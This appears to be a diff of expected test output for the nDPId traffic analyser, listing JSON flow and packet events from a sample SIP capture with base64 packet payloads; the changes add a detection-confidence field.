+00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":21,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1120469572844,"flow_last_seen":1120470002992,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":8952,"flow_avg_l4_payload_len":447,"midstream":0,"ts_msec":1120470032084,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":180000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"ts_msec":1120470049188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1120470049188,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":864,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":864,"pkt_l4_len":830,"ts_msec":1120470049188,"pkt":"ADBUADRWAODtAW69CABFAANSam4AAIARyuzAqAECyER4URPEE8QDPvKbSU5WSVRFIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI6NTA2MDticmFuY2g9ejloRzRiS25wMTA0OTg0MDUzLTQ0Y2U0YTQxMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206ICJhcmlrIiA8c2lwOjgxNjY2NkB2b2lwLmJydXJqdWxhLm5ldD47dGFnPTY0MzNlZjkNClRvOiA8c2lwOjk3MjM5Mjg3MDQ0QHZvaXAuYnJ1anVsYS5uZXQ+DQpDYWxsLUlEOiAxMDUwOTAyNTktNDQ2ZmFmN2FAMTkyLjE2OC4xLjINCkNTZXE6IDEgSU5WSVRFDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb24gMi4wLjUxLjE2DQpFeHBpcmVzOiAxMjANCkFjY2VwdDogYXBwbGljYXRpb24vc2RwDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3NkcA0KQ29udGVudC1MZW5ndGg6IDI3Mg0KQ29udGFjdDogPHNpcDo4MTY2NjZAMTkyLjE2OC4xLjI+DQpNYXgtRm9yd2FyZHM6IDcwDQpBbGxvdzogSU5WSVRFLCBBQ0ssIENBTkNFTCwgQllFLCBSRUZFUiwgT1BUSU9OUywgTk9USUZZLCBJTkZPDQoNCnY9MA0Kbz1TSVBQUyAxMDUwMTUxNjUgMTA1MDE1MTYyIElOIElQNCAxOTIuMTY4LjEuMg0Kcz1TSVAgY2FsbA0KYz1JTiBJUDQgMTkyLjE2OC4xLjINCnQ9MCAwDQptPWF1ZGlvIDMwMDAwIFJUUC9BVlAgMCA4IDk3IDIgMw0KYT1ydHBtYXA6MCBwY211LzgwMDANCmE9cnRwbWFwOjggcGNtYS84MDAwDQphPXJ0cG1hcDo5NyBpTEJDLzgwMDANCmE9cnRwbWFwOjIgRzcyNi0zMi84MDAwDQphPXJ0cG1hcDozIEdTTS84MDAwDQphPWZtdHA6OTcgbW9kZT0yMA0KYT1zZW5kcmVjdg0K"}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":180000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"ts_msec":1120470049188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470049188,"flow_last_seen":1120470049188,"flow_idle_time":180000,"flow_min_l4_payload_len":822,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":822,"flow_avg_l4_payload_len":822,"midstream":0,"ts_msec":1120470049188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 01520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1120470049696,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":864,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":864,"pkt_l4_len":830,"ts_msec":1120470049696,"pkt":"ADBUADRWAODtAW69CABFAANSanAAAIARyurAqAECyER4URPEE8QDPvKbSU5WSVRFIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI6NTA2MDticmFuY2g9ejloRzRiS25wMTA0OTg0MDUzLTQ0Y2U0YTQxMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206ICJhcmlrIiA8c2lwOjgxNjY2NkB2b2lwLmJydXJqdWxhLm5ldD47dGFnPTY0MzNlZjkNClRvOiA8c2lwOjk3MjM5Mjg3MDQ0QHZvaXAuYnJ1anVsYS5uZXQ+DQpDYWxsLUlEOiAxMDUwOTAyNTktNDQ2ZmFmN2FAMTkyLjE2OC4xLjINCkNTZXE6IDEgSU5WSVRFDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb24gMi4wLjUxLjE2DQpFeHBpcmVzOiAxMjANCkFjY2VwdDogYXBwbGljYXRpb24vc2RwDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3NkcA0KQ29udGVudC1MZW5ndGg6IDI3Mg0KQ29udGFjdDogPHNpcDo4MTY2NjZAMTkyLjE2OC4xLjI+DQpNYXgtRm9yd2FyZHM6IDcwDQpBbGxvdzogSU5WSVRFLCBBQ0ssIENBTkNFTCwgQllFLCBSRUZFUiwgT1BUSU9OUywgTk9USUZZLCBJTkZPDQoNCnY9MA0Kbz1TSVBQUyAxMDUwMTUxNjUgMTA1MDE1MTYyIElOIElQNCAxOTIuMTY4LjEuMg0Kcz1TSVAgY2FsbA0KYz1JTiBJUDQgMTkyLjE2OC4xLjINCnQ9MCAwDQptPWF1ZGlvIDMwMDAwIFJUUC9BVlAgMCA4IDk3IDIgMw0KYT1ydHBtYXA6MCBwY211LzgwMDANCmE9cnRwbWFwOjggcGNtYS84MDAwDQphPXJ0cG1hcDo5NyBpTEJDLzgwMDANCmE9cnRwbWFwOjIgRzcyNi0zMi84MDAwDQphPXJ0cG1hcDozIEdTTS84MDAwDQphPWZtdHA6OTcgbW9kZT0yMA0KYT1zZW5kcmVjdg0K"}
 01520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1120470050699,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":864,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":864,"pkt_l4_len":830,"ts_msec":1120470050699,"pkt":"ADBUADRWAODtAW69CABFAANSanIAAIARyujAqAECyER4URPEE8QDPvKbSU5WSVRFIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI6NTA2MDticmFuY2g9ejloRzRiS25wMTA0OTg0MDUzLTQ0Y2U0YTQxMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206ICJhcmlrIiA8c2lwOjgxNjY2NkB2b2lwLmJydXJqdWxhLm5ldD47dGFnPTY0MzNlZjkNClRvOiA8c2lwOjk3MjM5Mjg3MDQ0QHZvaXAuYnJ1anVsYS5uZXQ+DQpDYWxsLUlEOiAxMDUwOTAyNTktNDQ2ZmFmN2FAMTkyLjE2OC4xLjINCkNTZXE6IDEgSU5WSVRFDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb24gMi4wLjUxLjE2DQpFeHBpcmVzOiAxMjANCkFjY2VwdDogYXBwbGljYXRpb24vc2RwDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3NkcA0KQ29udGVudC1MZW5ndGg6IDI3Mg0KQ29udGFjdDogPHNpcDo4MTY2NjZAMTkyLjE2OC4xLjI+DQpNYXgtRm9yd2FyZHM6IDcwDQpBbGxvdzogSU5WSVRFLCBBQ0ssIENBTkNFTCwgQllFLCBSRUZFUiwgT1BUSU9OUywgTk9USUZZLCBJTkZPDQoNCnY9MA0Kbz1TSVBQUyAxMDUwMTUxNjUgMTA1MDE1MTYyIElOIElQNCAxOTIuMTY4LjEuMg0Kcz1TSVAgY2FsbA0KYz1JTiBJUDQgMTkyLjE2OC4xLjINCnQ9MCAwDQptPWF1ZGlvIDMwMDAwIFJUUC9BVlAgMCA4IDk3IDIgMw0KYT1ydHBtYXA6MCBwY211LzgwMDANCmE9cnRwbWFwOjggcGNtYS84MDAwDQphPXJ0cG1hcDo5NyBpTEJDLzgwMDANCmE9cnRwbWFwOjIgRzcyNi0zMi84MDAwDQphPXJ0cG1hcDozIEdTTS84MDAwDQphPWZtdHA6OTcgbW9kZT0yMA0KYT1zZW5kcmVjdg0K"}
-00641{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":42,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1120469572844,"flow_last_seen":1120470100322,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":8967,"flow_avg_l4_payload_len":389,"midstream":0,"ts_msec":1120470129594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00643{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":43,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120470049188,"flow_last_seen":1120470116279,"flow_idle_time":180000,"flow_min_l4_payload_len":347,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":486,"midstream":0,"ts_msec":1120470158626,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00641{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":46,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1120469572844,"flow_last_seen":1120470216689,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":8987,"flow_avg_l4_payload_len":332,"midstream":0,"ts_msec":1120470233794,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00643{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":51,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120470049188,"flow_last_seen":1120470116279,"flow_idle_time":180000,"flow_min_l4_payload_len":347,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":486,"midstream":0,"ts_msec":1120470250808,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120470049188,"flow_last_seen":1120470116279,"flow_idle_time":180000,"flow_min_l4_payload_len":347,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":486,"midstream":0,"ts_msec":1120470315341,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00643{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":57,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1120469572844,"flow_last_seen":1120470315341,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":14266,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470344564,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00643{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":61,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1120469572844,"flow_last_seen":1120470431658,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":14286,"flow_avg_l4_payload_len":340,"midstream":0,"ts_msec":1120470456154,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00641{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":69,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1120469572844,"flow_last_seen":1120470509599,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":18492,"flow_avg_l4_payload_len":369,"midstream":0,"ts_msec":1120470796804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":42,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1120469572844,"flow_last_seen":1120470100322,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":8967,"flow_avg_l4_payload_len":389,"midstream":0,"ts_msec":1120470129594,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":43,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120470049188,"flow_last_seen":1120470116279,"flow_idle_time":180000,"flow_min_l4_payload_len":347,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":486,"midstream":0,"ts_msec":1120470158626,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":46,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1120469572844,"flow_last_seen":1120470216689,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":8987,"flow_avg_l4_payload_len":332,"midstream":0,"ts_msec":1120470233794,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":51,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120470049188,"flow_last_seen":1120470116279,"flow_idle_time":180000,"flow_min_l4_payload_len":347,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":486,"midstream":0,"ts_msec":1120470250808,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"sip.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1120470049188,"flow_last_seen":1120470116279,"flow_idle_time":180000,"flow_min_l4_payload_len":347,"flow_max_l4_payload_len":822,"flow_tot_l4_payload_len":8756,"flow_avg_l4_payload_len":486,"midstream":0,"ts_msec":1120470315341,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":57,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1120469572844,"flow_last_seen":1120470315341,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":14266,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470344564,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":61,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1120469572844,"flow_last_seen":1120470431658,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":14286,"flow_avg_l4_payload_len":340,"midstream":0,"ts_msec":1120470456154,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":69,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1120469572844,"flow_last_seen":1120470509599,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":18492,"flow_avg_l4_payload_len":369,"midstream":0,"ts_msec":1120470796804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796804,"flow_last_seen":1120470796804,"flow_idle_time":180000,"flow_min_l4_payload_len":466,"flow_max_l4_payload_len":466,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":466,"midstream":0,"ts_msec":1120470796804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01048{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1120470796804,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":508,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":508,"pkt_l4_len":474,"ts_msec":1120470796804,"pkt":"ADBUADRWAODtAW69CABFAAHua6IAAIARFZ3AqAEC1PIhIxPEE8QB2h4sUkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wMjg4NzQ2ODYtNDU1ZGJiZDkxOTIuMTY4LjEuMjtycG9ydA0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MWI4OWJjZA0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz4NCkNhbGwtSUQ6IDI5ODU4MTQ3LTQ2NWIwNzUyQDI5ODU4MDUxLTQ2NWIwN2IyDQpDb250YWN0OiBwZWwgPHNpcDozNTEwNDcyM0AxOTIuMTY4LjEuMjo1MDYwO2xpbmU9N2QzNjU1OGYzMTM2NzA1MT47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDEgUkVHSVNURVINCkNvbnRlbnQtTGVuZ3RoOiAwDQpNYXgtRm9yd2FyZHM6IDcwDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb24gMi4wLjUxLjE2DQoNCg=="}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796804,"flow_last_seen":1120470796804,"flow_idle_time":180000,"flow_min_l4_payload_len":466,"flow_max_l4_payload_len":466,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":466,"midstream":0,"ts_msec":1120470796804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470796804,"flow_last_seen":1120470796804,"flow_idle_time":180000,"flow_min_l4_payload_len":466,"flow_max_l4_payload_len":466,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":466,"midstream":0,"ts_msec":1120470796804,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 01069{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1120470796941,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":524,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":524,"pkt_l4_len":490,"ts_msec":1120470796941,"pkt":"AODtAW69ADBUADRWCABFAAH+AABAADcRii\/U8iEjwKgBAhPEE8QB6uoyU0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiAyOTg1ODE0Ny00NjViMDc1MkAyOTg1ODA1MS00NjViMDdiMg0KQ1NlcTogMSBSRUdJU1RFUg0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MWI4OWJjZA0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTAwLTA0MDcyLTE3MDFiOTQxLTc3OTk0NTg0Mw0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjtyZWNlaXZlZD04MC4yMzAuMjE5LjcwO3Jwb3J0PTUwNjA7YnJhbmNoPXo5aEc0YktucDI4ODc0Njg2LTQ1NWRiYmQ5MTkyLjE2OC4xLjINCldXVy1BdXRoZW50aWNhdGU6IERpZ2VzdCByZWFsbT0ic2lwLmN5YmVyY2l0eS5kayIsbm9uY2U9IjE3MDFiOTMzM2U4NzEzMmU3Zjc0N2M1MDcyNjNkOTMiLG9wYXF1ZT0iMTcwMWExMzUxZjcwNzk1IixzdGFsZT1mYWxzZSxhbGdvcml0aG09TUQ1DQpDb250ZW50LUxlbmd0aDogMA0KDQo="}
 01332{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"sip.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1120470814189,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":721,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":721,"pkt_l4_len":687,"ts_msec":1120470814189,"pkt":"ADBUADRWAODtAW69CABFAALDa6kAAIARFMHAqAEC1PIhIxPEE8QCr1LWUkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wMjcxMTExNzUtNDMzMGM5ZDYxOTIuMTY4LjEuMjtycG9ydA0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MTlkYjMxNg0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz4NCkNhbGwtSUQ6IDI5ODU4MTQ3LTQ2NWIwNzUyQDI5ODU4MDUxLTQ2NWIwN2IyDQpDb250YWN0OiBwZWwgPHNpcDozNTEwNDcyM0AxOTIuMTY4LjEuMjo1MDYwO2xpbmU9N2QzNjU1OGYzMTM2NzA1MT47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDIgUkVHSVNURVINCkNvbnRlbnQtTGVuZ3RoOiAwDQpBdXRob3JpemF0aW9uOiBEaWdlc3QgdXNlcm5hbWU9InZvaTE4MDYyIixyZWFsbT0ic2lwLmN5YmVyY2l0eS5kayIsdXJpPSJzaXA6MTkyLjE2OC4xLjIiLG5vbmNlPSIxNzAxYjkzMzNlODcxMzJlN2Y3NDdjNTA3MjYzZDkzIixvcGFxdWU9IjE3MDFhMTM1MWY3MDc5NSIsbmM9IjAwMDAwMDAxIixyZXNwb25zZT0iMGRmOTZlYjUyOGJiNjMwYTE2ZmQwMjUyNjE4Y2YzY2IiDQpNYXgtRm9yd2FyZHM6IDcwDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb24gMi4wLjUxLjE2DQoNCg=="}
